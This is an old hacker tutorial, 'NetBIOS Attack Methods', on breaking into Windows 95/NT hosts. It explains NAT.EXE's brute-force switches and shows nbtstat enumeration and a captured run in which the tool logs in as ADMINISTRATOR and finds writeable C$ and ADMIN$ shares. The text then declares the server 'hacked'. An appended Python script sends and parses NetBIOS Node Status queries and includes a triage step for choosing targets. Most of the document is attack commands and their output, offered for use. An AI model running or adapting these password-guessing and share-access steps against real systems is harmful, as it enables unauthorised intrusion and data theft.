Sw0rdFish

NetBIOS Attack Methods

This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, and Windows 98 beta 2.1. One of the components being used is NAT.EXE by Andrew Tridgell. A discussion of the tool, its switches, and common techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

Switches:

-o  Specify the output file. All results from the scan will be written to the
    specified file, in addition to standard output.

-u  Specify the file to read usernames from. Usernames will be read from the
    specified file when attempting to guess the password on the remote server.
    Usernames should appear one per line in the specified file.

-p  Specify the file to read passwords from. Passwords will be read from the
    specified file when attempting to guess the password on the remote server.
    Passwords should appear one per line in the specified file.

<address>
    Addresses should be specified in comma-delimited format, with no spaces.
    Valid address specifications include:

    hostname                - "hostname" is added
    127.0.0.1-127.0.0.3     - adds addresses 127.0.0.1 through 127.0.0.3
    127.0.0.1-3             - adds addresses 127.0.0.1 through 127.0.0.3
    127.0.0.1-3,7,10-20     - adds addresses 127.0.0.1 through 127.0.0.3,
                              127.0.0.7, 127.0.0.10 through 127.0.0.20
    hostname,127.0.0.1-3    - adds "hostname" and 127.0.0.1 through 127.0.0.3

    All combinations of hostnames and address ranges as specified above are
    valid.

C:\>nbtstat -A XXX.XX.XXX.XX

NetBIOS Remote Machine Name Table

    Name                 Type         Status
---------------------------------------------
STUDENT1         <20>  UNIQUE      Registered
STUDENT1         <00>  UNIQUE      Registered
DOMAIN1          <00>  GROUP       Registered
DOMAIN1          <1C>  GROUP       Registered
DOMAIN1          <1B>  UNIQUE      Registered
STUDENT1         <03>  UNIQUE      Registered
DOMAIN1          <1E>  GROUP       Registered
DOMAIN1          <1D>  UNIQUE      Registered
..__MSBROWSE__.  <01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial NetBIOS 16th bit listing:

Computername  <00>  UNIQUE  Workstation Service name
              <00>  GROUP   Domain name
Server        <20>  UNIQUE  Server Service name
Computername  <03>  UNIQUE  Registered by the Messenger service. This is the
                            computername to be added to the LMHOSTS file, which
                            is not necessary to use NAT.EXE but is necessary if
                            you would like to view the remote computer in
                            Network Neighborhood.
Username      <03>          Registered by the Messenger service.
Domainname    <1B>          Registers the local computer as the master browser
                            for the domain
Domainname    <1C>          Registers the computer as a domain controller for
                            the domain (PDC or BDC)
Domainname    <1D>          Registers the local client as the local segment's
                            master browser for the domain
Domainname    <1E>          Registers as a Group NetBIOS Name
              <BF>          Network Monitor Name
              <BE>          Network Monitor Agent
              <06>          RAS Server
              <1F>          Net DDE
              <21>          RAS Client

* Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the user accounts database and modifying password and logon requirements.

* Net Computer: This adds or deletes computers from a domain's database.

* Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.

* Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.

* Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.

* Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.

* Net Help: Help with these commands.

* Net Helpmsg message#: Get help with a particular net error or function message.

* Net Localgroup: Use this to list local groups on servers. You can also modify those groups.

* Net Name: This command shows the names of computers and users to which messages are sent on the computer.

* Net Pause: Use this command to suspend a certain NT service.

* Net Print: Displays print jobs and shared queues.

* Net Send: Use this command to send messages to other users, computers, or messaging names on the network.

* Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.

* Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.

* Net Statistics Server or Workstation: Shows the statistics log.

* Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service may stop other services.

* Net Time: This command is used to display or set the time for a computer or domain.

* Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.

* Net User: This command will display a list of user accounts for the computer, and has options for creating and modifying those accounts.

* Net View: This command displays a list of resources being shared on a computer, including NetWare servers.

Special note on DOS and older Windows machines: The commands listed above are available on Windows NT Server and Workstation; DOS and older Windows clients have these NET commands available:

Net Config

Net Diag (runs the diagnostic program)

Net Help

Net Init (loads protocol and network adapter drivers.)

Net Logoff

Net Logon

Net Password (changes password)

Net Print

Net Start

Net Stop

Net Time

Net Use

Net Ver (displays the type and version of the network redirector)

Net View

For this section, the commands being used are NET VIEW and NET USE.

What follows is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.

C:\>nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

    Sharename   Type    Comment
    ---------   ----    -------
    ADMIN$      Disk:   Remote Admin
    C$          Disk:   Default share
    IPC$        IPC:    Remote IPC
    NETLOGON    Disk:   Logon server share
    Test        Disk:

[*]--- This machine has a browse list:

    Server          Comment
    ---------       -------
    STUDENT1

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default share of Everyone/Full Control is active, then you are done; the server is hacked. If not, keep playing. You will be surprised what you find out.
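Added example (not part of the post above and not NAT.EXE's code): what `nbtstat -A` does on the wire. It is a NetBIOS Node Status request (RFC 1001/1002) to UDP port 137 for the wildcard name `*`; the reply carries the name table shown earlier, and the 16th byte of each entry is the suffix whose meanings the post lists. The script builds that request, parses a response into the table, and decodes the suffixes. The response bytes are constructed in the script to mirror the STUDENT1/DOMAIN1 table (no packet was captured), the function names are this example's own, and `query_host()` is the only part that touches a network.

```python
"""Node Status (NBSTAT) query on UDP/137: what `nbtstat -A` sends and receives."""
import socket
import struct

NBSTAT = 0x0021                  # RR type of a Node Status request/response
WILDCARD = b"*" + b"\x00" * 15   # the "*" name: the queried node answers for itself

# Suffix (16th byte) meanings from the post, split by the G flag because the
# same value means different things for UNIQUE and GROUP names (e.g. <00>).
UNIQUE_SUFFIXES = {0x00: "Workstation Service", 0x03: "Messenger Service (computer or user)",
                   0x06: "RAS Server", 0x1B: "Domain Master Browser", 0x1D: "Segment Master Browser",
                   0x1F: "Net DDE", 0x20: "Server Service", 0x21: "RAS Client",
                   0xBE: "Network Monitor Agent", 0xBF: "Network Monitor Name"}
GROUP_SUFFIXES = {0x00: "Domain Name", 0x01: "__MSBROWSE__ (master browser)",
                  0x1C: "Domain Controller (PDC or BDC)", 0x1E: "Browser Elections"}

def encode_name(name16: bytes) -> bytes:
    """RFC 1001 first-level encoding: each nibble becomes 'A' + nibble (32 chars)."""
    assert len(name16) == 16
    enc = bytes(0x41 + nib for b in name16 for nib in (b >> 4, b & 0x0F))
    return bytes([len(enc)]) + enc + b"\x00"

def build_node_status_request(txid: int = 0x1234) -> bytes:
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # query, QDCOUNT=1
    return header + encode_name(WILDCARD) + struct.pack(">HH", NBSTAT, 0x0001)

def parse_node_status_response(pkt: bytes) -> dict:
    """Decode a Node Status response into the name table that nbtstat -A prints."""
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack_from(">HHHHHH", pkt, 0)
    if not flags & 0x8000 or ancount != 1:
        raise ValueError("not a Node Status response")
    if flags & 0x000F:
        raise ValueError(f"RCODE {flags & 0xF}")
    off = 12
    off += 1 + pkt[off] + 1                      # skip the length-prefixed RR name
    rtype, _rclass, _ttl, rdlen = struct.unpack_from(">HHIH", pkt, off)
    off += 10
    if rtype != NBSTAT:
        raise ValueError(f"unexpected RR type {rtype:#06x}")
    rdata = pkt[off:off + rdlen]
    names, pos = [], 1
    for _ in range(rdata[0]):                    # NUM_NAMES entries of 18 bytes each
        raw, suffix = rdata[pos:pos + 15], rdata[pos + 15]
        (nflags,) = struct.unpack_from(">H", rdata, pos + 16)
        pos += 18
        group = bool(nflags & 0x8000)            # G bit; ACT=0x0400, CNF=0x0800, DRG=0x1000
        # nbtstat prints non-printable bytes as '.', hence "..__MSBROWSE__."
        shown = "".join(chr(c) if 0x20 <= c < 0x7F else "." for c in raw).rstrip(" ")
        names.append({
            "name": shown, "suffix": suffix, "type": "GROUP" if group else "UNIQUE",
            "status": ("Registered" if nflags & 0x0400 else "Conflict" if nflags & 0x0800
                       else "Deregistering" if nflags & 0x1000 else "Unknown"),
            "role": (GROUP_SUFFIXES if group else UNIQUE_SUFFIXES).get(suffix, "unknown"),
        })
    mac = rdata[pos:pos + 6]                     # UNIT_ID, first field of the statistics block
    return {"txid": txid, "names": names, "mac": "-".join(f"{b:02X}" for b in mac)}

def summarize(table: dict) -> dict:
    """What a NAT-style attack keys on: hosts, domains, logged-on users, DC and share roles."""
    names = table["names"]
    hosts = {n["name"] for n in names if n["type"] == "UNIQUE" and n["suffix"] == 0x00}
    return {
        "hosts": sorted(hosts),
        "domains": sorted(n["name"] for n in names if n["type"] == "GROUP" and n["suffix"] == 0x00),
        # a <03> name that is not a computer name is a logged-on user (Messenger service)
        "users": sorted(n["name"] for n in names if n["suffix"] == 0x03 and n["name"] not in hosts),
        "domain_controller": any(n["type"] == "GROUP" and n["suffix"] == 0x1C for n in names),
        "domain_master_browser": any(n["type"] == "UNIQUE" and n["suffix"] == 0x1B for n in names),
        "file_server": any(n["type"] == "UNIQUE" and n["suffix"] == 0x20 for n in names),
    }

# Constructed response mirroring the post's nbtstat -A table (not a real capture).
SAMPLE_ENTRIES = [
    (b"STUDENT1", 0x20, False), (b"STUDENT1", 0x00, False), (b"DOMAIN1", 0x00, True),
    (b"DOMAIN1", 0x1C, True), (b"DOMAIN1", 0x1B, False), (b"STUDENT1", 0x03, False),
    (b"DOMAIN1", 0x1E, True), (b"DOMAIN1", 0x1D, False), (b"\x01\x02__MSBROWSE__\x02", 0x01, True),
]

def build_sample_response(txid: int = 0x1234) -> bytes:
    def entry(name: bytes, suffix: int, group: bool) -> bytes:
        flags = (0x8000 if group else 0) | 0x0400               # G + ACT
        return name.ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", flags)
    stats = bytes.fromhex("00C04FC48C9D") + b"\x00" * 40        # MAC + zeroed statistics
    rdata = bytes([len(SAMPLE_ENTRIES)]) + b"".join(entry(*e) for e in SAMPLE_ENTRIES) + stats
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)   # response, AA set, ANCOUNT=1
    return header + encode_name(WILDCARD) + struct.pack(">HHIH", NBSTAT, 0x0001, 0, len(rdata)) + rdata

def query_host(ip: str, timeout: float = 2.0) -> dict:
    """Live equivalent of `nbtstat -A ip`; not called below, the constructed sample is parsed."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(), (ip, 137))
        data, _ = s.recvfrom(4096)
    return parse_node_status_response(data)

if __name__ == "__main__":
    for n in parse_node_status_response(build_sample_response())["names"]:
        print(f"{n['name']:<16} <{n['suffix']:02X}>  {n['type']:<7} {n['status']:<11} {n['role']}")
```

Run as-is and it prints the same nine rows as the nbtstat table, with the role column decoded. `summarize()` is the triage step: a GROUP <1C> entry tells you the host is a domain controller, UNIQUE <1B>/<1D> identify browsers, and UNIQUE <20> means the Server service is up, which is exactly when NAT's share-access pass has something to find. Point `query_host()` only at hosts you are authorized to test; UDP/137 is unauthenticated, so any host that answers it hands out this table to anyone who asks.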
